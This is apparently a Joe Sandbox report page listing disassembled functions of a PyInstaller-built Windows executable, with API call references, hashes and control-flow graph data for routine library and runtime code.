                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 995526605-0
                                                                                                                                                                                                                                                        • Opcode ID: fa90e23b90d603ff8a1fc3170628a297920662056bab6e12f28c88f429b12389
                                                                                                                                                                                                                                                        • Instruction ID: 88d25a28f14b965947faa46e3455ce9b7f29d5039ded7c519c6a1774e2ce05b8
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fa90e23b90d603ff8a1fc3170628a297920662056bab6e12f28c88f429b12389
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DD215E31A0C74342EE148B55B78422AB7A1EFA57A0F980235FA6DD3AECDFBCD4458700
                                                                                                                                                                                                                                                        Function 00007FF65E2890E0 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF65E288570: GetCurrentProcess.KERNEL32 ref: 00007FF65E288590
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF65E288570: OpenProcessToken.ADVAPI32 ref: 00007FF65E2885A3
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF65E288570: GetTokenInformation.KERNELBASE ref: 00007FF65E2885C8
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF65E288570: GetLastError.KERNEL32 ref: 00007FF65E2885D2
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF65E288570: GetTokenInformation.KERNELBASE ref: 00007FF65E288612
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF65E288570: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF65E28862E
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF65E288570: CloseHandle.KERNEL32 ref: 00007FF65E288646
                                                                                                                                                                                                                                                        • LocalFree.KERNEL32(?,00007FF65E283C55), ref: 00007FF65E28916C
                                                                                                                                                                                                                                                        • LocalFree.KERNEL32(?,00007FF65E283C55), ref: 00007FF65E289175
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                                        • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                                                        • API String ID: 6828938-1529539262
                                                                                                                                                                                                                                                        • Opcode ID: 5ed7a9ba3e6ce910408607b93085540bd422a8d0f9e00f9f84049ca226c14b37
                                                                                                                                                                                                                                                        • Instruction ID: e9d8dab3fe82b62e0af5a68f00cf7bda707a0707b00caa4a4a15cef69107325d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5ed7a9ba3e6ce910408607b93085540bd422a8d0f9e00f9f84049ca226c14b37
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E9211E61A0C74281EE14AB10E7152EA72A5FFA4780F8C5435FA4DE3B9ADF7CD9458740
                                                                                                                                                                                                                                                        Function 00007FF65E29CF60 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 965 7ff65e29cf60-7ff65e29cf85 966 7ff65e29d253 965->966 967 7ff65e29cf8b-7ff65e29cf8e 965->967 968 7ff65e29d255-7ff65e29d265 966->968 969 7ff65e29cf90-7ff65e29cfc2 call 7ff65e29a814 967->969 970 7ff65e29cfc7-7ff65e29cff3 967->970 969->968 972 7ff65e29cffe-7ff65e29d004 970->972 973 7ff65e29cff5-7ff65e29cffc 970->973 974 7ff65e29d014-7ff65e29d029 call 7ff65e2a391c 972->974 975 7ff65e29d006-7ff65e29d00f call 7ff65e29c320 972->975 973->969 973->972 980 7ff65e29d02f-7ff65e29d038 974->980 981 7ff65e29d143-7ff65e29d14c 974->981 975->974 980->981 984 7ff65e29d03e-7ff65e29d042 980->984 982 7ff65e29d14e-7ff65e29d154 981->982 983 7ff65e29d1a0-7ff65e29d1c5 WriteFile 981->983 987 7ff65e29d156-7ff65e29d159 982->987 988 7ff65e29d18c-7ff65e29d19e call 7ff65e29ca18 982->988 985 7ff65e29d1d0 983->985 986 7ff65e29d1c7-7ff65e29d1cd GetLastError 983->986 989 7ff65e29d053-7ff65e29d05e 984->989 990 7ff65e29d044-7ff65e29d04c call 7ff65e2947c0 984->990 991 7ff65e29d1d3 985->991 986->985 992 7ff65e29d178-7ff65e29d18a call 7ff65e29cc38 987->992 993 7ff65e29d15b-7ff65e29d15e 987->993 1013 7ff65e29d130-7ff65e29d137 988->1013 995 7ff65e29d06f-7ff65e29d084 GetConsoleMode 989->995 996 7ff65e29d060-7ff65e29d069 989->996 990->989 998 7ff65e29d1d8 991->998 992->1013 999 7ff65e29d1e4-7ff65e29d1ee 993->999 1000 7ff65e29d164-7ff65e29d176 call 7ff65e29cb1c 993->1000 1003 7ff65e29d08a-7ff65e29d090 995->1003 1004 7ff65e29d13c 995->1004 996->981 996->995 1006 7ff65e29d1dd 998->1006 1007 7ff65e29d1f0-7ff65e29d1f5 999->1007 1008 7ff65e29d24c-7ff65e29d251 999->1008 1000->1013 1011 7ff65e29d096-7ff65e29d099 1003->1011 1012 7ff65e29d119-7ff65e29d12b call 7ff65e29c5a0 1003->1012 1004->981 1006->999 1014 7ff65e29d223-7ff65e29d22d 1007->1014 1015 7ff65e29d1f7-7ff65e29d1fa 1007->1015 1008->968 1017 7ff65e29d0a4-7ff65e29d0b2 1011->1017 1018 7ff65e29d09b-7ff65e29d09e 1011->1018 1012->1013 1013->998 1024 7ff65e29d22f-7ff65e29d232 1014->1024 1025 7ff65e29d234-7ff65e29d243 1014->1025 1022 7ff65e29d213-7ff65e29d21e call 7ff65e294ec4 1015->1022 1023 7ff65e29d1fc-7ff65e29d20b 1015->1023 1020 7ff65e29d110-7ff65e29d114 1017->1020 1021 7ff65e29d0b4 1017->1021 1018->1006 1018->1017 1020->991 1026 7ff65e29d0b8-7ff65e29d0cf call 7ff65e2a39e8 1021->1026 1022->1014 1023->1022 1024->966 1024->1025 1025->1008 1031 7ff65e29d0d1-7ff65e29d0dd 1026->1031 1032 7ff65e29d107-7ff65e29d10d GetLastError 1026->1032 1033 7ff65e29d0df-7ff65e29d0f1 call 7ff65e2a39e8 1031->1033 1034 7ff65e29d0fc-7ff65e29d103 1031->1034 1032->1020 1033->1032 1038 7ff65e29d0f3-7ff65e29d0fa 1033->1038 1034->1020 1036 7ff65e29d105 1034->1036 1036->1026 1038->1034
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF65E29CF4B), ref: 00007FF65E29D07C
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF65E29CF4B), ref: 00007FF65E29D107
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 953036326-0
                                                                                                                                                                                                                                                        • Opcode ID: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                                                                                                                                                                                        • Instruction ID: 6bdec473a1115a50d68ea61b8e6f73ab385847abfd400c03a9e46faf91eeb7b7
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9D91B472E1865185FF609F6597402BD3BA0BB64B88F5C6139EE0EF7699CE38D482D700
                                                                                                                                                                                                                                                        Function 00007FF65E295628 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1279662727-0
                                                                                                                                                                                                                                                        • Opcode ID: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
                                                                                                                                                                                                                                                        • Instruction ID: abfcec0c1eccae45def0ec14e285701159a39fc1a6af7c93d519b1c65f2ca903
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 74418322E5878183EB508B2197503797360FFA47A4F14A339FA9C93AD9DF7CA5E08710
                                                                                                                                                                                                                                                        Function 00007FF65E28CC3C Relevance: 4.6, APIs: 3, Instructions: 94COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3251591375-0
                                                                                                                                                                                                                                                        • Opcode ID: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                                                                                                                                                                                        • Instruction ID: 8f88573af3c10fcc84ea9442cc27f9188a21e52087fdf66bad6a8a81d67caf13
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2A310721E4C24641FE64AB659B623B93681AF71784F4C5034FA0EF72DFDE6DA844C202
                                                                                                                                                                                                                                                        Function 00007FF65E299A30 Relevance: 4.5, APIs: 3, Instructions: 14COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1703294689-0
                                                                                                                                                                                                                                                        • Opcode ID: 148d460979eed4a43ebbf671c65dc2dc638c0d89c9c01e8e00358d5495882c84
                                                                                                                                                                                                                                                        • Instruction ID: 9f681d80292aad70988bec5bd4fc457d585bbd81a8d1862f3aab52163497657b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 148d460979eed4a43ebbf671c65dc2dc638c0d89c9c01e8e00358d5495882c84
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 29D09E10B4870642EF142B715F5507C3256AF68711F1C2438E80BEA39BDD6CA8898340
                                                                                                                                                                                                                                                        Function 00007FF65E29013C Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        • Opcode ID: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
                                                                                                                                                                                                                                                        • Instruction ID: 82982899e2f7472e2de185292d1da54c25d4651a48abe4ff1f0fbde8bcf0906a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C4512661B0924986EF249E259700A7A7291AF60BA4F0C6634FD7CE37CDCE3CE4808606
                                                                                                                                                                                                                                                        Function 00007FF65E29C134 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2976181284-0
                                                                                                                                                                                                                                                        • Opcode ID: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                                                                                                                        • Instruction ID: ac8a5fb4ccc9e17118baaf58dc0298b0c84d4ac98d5e0341e74d6dd2e2f5c245
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6911DD22608A8181DE208B25AB40069B361AB61BF0F5C1331FA7D9B7EDCE78D0808700
                                                                                                                                                                                                                                                        Function 00007FF65E29A948 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • RtlFreeHeap.NTDLL(?,?,?,00007FF65E2A2D22,?,?,?,00007FF65E2A2D5F,?,?,00000000,00007FF65E2A3225,?,?,?,00007FF65E2A3157), ref: 00007FF65E29A95E
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF65E2A2D22,?,?,?,00007FF65E2A2D5F,?,?,00000000,00007FF65E2A3225,?,?,?,00007FF65E2A3157), ref: 00007FF65E29A968
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 485612231-0
                                                                                                                                                                                                                                                        • Opcode ID: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
                                                                                                                                                                                                                                                        • Instruction ID: 9592f29e1f8b644335457ac338357a01178b4cdde075680979a68b7ada0f497e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: ACE08C50F4930243FF186BF2AB951393251BFB8B00F4D1430F80DE22A9EE6CA8C18310
                                                                                                                                                                                                                                                        Function 00007FF65E29AB58 Relevance: 2.6, APIs: 2, Instructions: 59COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • CloseHandle.KERNELBASE(?,?,?,00007FF65E29A9D5,?,?,00000000,00007FF65E29AA8A), ref: 00007FF65E29ABC6
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF65E29A9D5,?,?,00000000,00007FF65E29AA8A), ref: 00007FF65E29ABD0
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 918212764-0
                                                                                                                                                                                                                                                        • Opcode ID: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                                                                                                                                                                                        • Instruction ID: 4d819c8bf71fcc0032d09beda254ae6bef654563870bfdf9c708a506b46b0d80
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DE216251F1878241EEA45761979137936829FB47D4F0C6279F92EE7BDDCE6CE4C14200
                                                                                                                                                                                                                                                        Function 00007FF65E29BEAC Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        • Opcode ID: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                                                                                                                                                                                        • Instruction ID: d7ff0fc84c63885f4ad9997c29539fd5777178999f6cbd563262bbf4002886c9
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8841D43291824587EE348B29A74427973A1EF65B81F182131F68ED36D9CF2CE482CB54
                                                                                                                                                                                                                                                        Function 00007FF65E287F90 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
